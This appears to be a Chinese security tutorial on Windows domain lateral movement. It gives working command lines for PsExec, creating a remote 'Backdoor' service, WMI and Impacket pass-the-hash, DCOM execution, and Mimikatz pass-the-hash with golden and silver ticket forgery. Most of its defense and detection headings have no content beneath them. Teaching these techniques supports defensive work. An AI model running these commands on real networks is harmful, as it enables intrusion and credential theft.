作为一名长期从事企业安全防护的从业者,我见证了内网横向移动技术从简单到复杂的演变过程。横向移动(Lateral Movement)是攻击者在攻陷内网某台主机后,以此为跳板向其他主机渗透的关键技术手段。这种攻击方式之所以危险,是因为它能够绕过传统边界防护,直接在内网中扩散。
在内网渗透测试中,横向移动技术具有三个不可替代的价值:
重要提示:所有技术讨论仅限授权测试使用,未经授权的测试可能违反相关法律法规。
PsExec是Sysinternals套件中的合法工具,但常被攻击者滥用。其工作原理可分为四个阶段:
典型利用命令示例:
bash复制PsExec64.exe -accepteula \\192.168.1.100 -u DOMAIN\user -p password -s cmd.exe
防御检测要点:
Windows服务控制管理器(SC)提供了命令行接口,攻击者常用来创建恶意服务:
bash复制sc \\TARGET create Backdoor binpath= "cmd.exe /c C:\malware.exe"
sc \\TARGET start Backdoor
操作注意事项:
Windows Management Instrumentation(WMI)提供了更隐蔽的远程执行方式,其优势在于:
进程信息查询:
bash复制wmic /node:192.168.1.100 /user:admin /password:123 process list brief
远程进程创建:
bash复制wmic /node:192.168.1.100 /user:admin /password:123 process call create "cmd.exe /c ipconfig > C:\result.txt"
Impacket工具集中的wmiexec.py提供了更强大的功能:
python复制python wmiexec.py -hashes LMHASH:NTHASH domain/user@target
实战技巧:
-persist参数避免进程卡死-codec参数处理中文输出-debug参数排查连接问题分布式组件对象模型(DCOM)允许跨网络调用COM对象,攻击者常利用以下COM组件:
powershell复制$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.100"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","Minimized")
powershell复制$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","192.168.1.100"))
$excel.DDEInitiate("cmd.exe", "/c calc.exe")
防御建议:
PtH攻击利用NTLM认证机制的特点:
Mimikatz实现:
bash复制sekurlsa::pth /user:Administrator /domain:CONTOSO /ntlm:329153f560eb329c0e1deea55e88a1e9
生成条件:
生成命令:
bash复制kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:hash /ticket:gold.kirbi
针对特定服务的伪造:
bash复制kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-123456789-1234567890-123456789 /target:server.contoso.com /service:HTTP /rc4:hash /ticket:silver.kirbi
检测方法:
密码安全:
权限控制:
系统加固:
行为分析:
日志审计:
网络分段:
在一次红队评估中,我们通过以下路径完成了内网横向移动:
关键教训:
| 工具名称 | 用途 | 备注 |
|---|---|---|
| Mimikatz | 凭证提取/PtH攻击 | 需绕过杀毒 |
| Impacket | 多种协议利用 | Python实现 |
| Cobalt Strike | 综合渗透平台 | 商业工具 |
| BloodHound | 域关系分析 | 可视化展示 |
微软安全文档:
行业标准:
实践环境:
在实际防御工作中,我建议采用"假设已被入侵"的思维,重点监控特权账户活动,建立完善的日志审计机制,并定期进行红蓝对抗演练。只有真正理解攻击者的技术手段,才能构建有效的防御体系。